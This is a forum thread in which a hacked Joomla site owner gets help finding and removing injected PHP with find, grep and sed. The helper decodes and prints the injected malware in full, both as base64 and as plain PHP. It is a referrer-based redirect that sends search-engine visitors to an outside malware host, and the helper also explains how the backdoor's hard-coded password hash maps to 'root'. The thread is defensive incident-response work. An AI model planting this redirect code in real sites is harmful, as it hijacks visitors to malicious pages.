Find and replace command

Forum rules
Before you post please read how to get help
livicrew
Level 1
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Find and replace command

Postby livicrew » Thu Jan 05, 2012 9:41 am

Hi guys,

Recently I needed to clean up hacked code on my webserver, I used the following to find the base64 coding

Code: Select all

find . -type f -name "*.php" -exec grep -H "eval(base64decode)DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ==" {} \; > potentially_infected_files.txt

This gave me a list of infected files, I then manually deleted the scripting.

How could I use this command (or SED) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromisation.
Any help would be much appreciated.

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 9:45 am

Code: Select all

find -name "*.php" -type f -exec sed -i 's/<?php \/**\/ eval(base64_decode("DQplcn.*?>//g' {}\;


should remove them/it.

YMMV. Make backups.
Windows assumes you're an idiot.
Linux demands proof of it.

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 9:48 am

BTW:

That reads

Code: Select all

$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
   if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://newyrfhrh.bij.pl/");
      exit();
   }
}
}


which comes from

Code: Select all

echo <long_string_after_'"eval(base64decode)" | base64 -d
Windows assumes you're an idiot.
Linux demands proof of it.

livicrew
Level 1
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:05 am

Thanks for that, I will make very good use of it.

How did you 'read' the file ?? Also, can I find the password he used in his script?

I read this and the guy managed to read the password blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html This was the exact hack I had.

This would be useful, as I could delete every backdoor onto my website using his script.

Thanks again

Peter

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:24 am

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
This is shared hosting or not?

I 'found' it with terminal >

Code: Select all

echo DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ== | base64 -d


Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/ "if you come from {list_of_referrers]
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks but it is actually the Symptom of a hack. What does

Code: Select all

find `pwd` . -name z.php -exec less {} \;
show us?
The password is usually hard-coded in php file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it and never run joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ
Windows assumes you're an idiot.
Linux demands proof of it.

livicrew
Level 1
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:29 am

Hi

It's not my article, I found it while working on my hack on my joomla website. It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.

I am on shared hosting.

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:38 am

Peter:

livicrew wrote:... Also, can I find the password he used in his script?


Terminal >

Code: Select all

find `pwd` . -type f -name "*.php" -exec grep $auth_pass {} \;


IF you get a "63a9f0ea7bb98050796b649e85481845" in the output/string, the password is "root" (no quotes)

livicrew wrote:...as I could delete every backdoor onto my website using his script.

Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ
Windows assumes you're an idiot.
Linux demands proof of it.

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 10:43 am

Peter:

livicrew wrote:...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.


Got backup?
Windows assumes you're an idiot.
Linux demands proof of it.

livicrew
Level 1
Level 1
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby livicrew » Thu Jan 05, 2012 10:57 am

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla !

User avatar
Habitual
Level 12
Level 12
Posts: 4207
Joined: Sun Nov 21, 2010 8:31 pm
Location: Youngstown, Ohio

Re: Find and replace command

Postby Habitual » Thu Jan 05, 2012 11:26 am

Peter:

Check your PMs...
Windows assumes you're an idiot.
Linux demands proof of it.


Return to “Scripts & Bash”

Who is online

Users browsing this forum: No registered users and 2 guests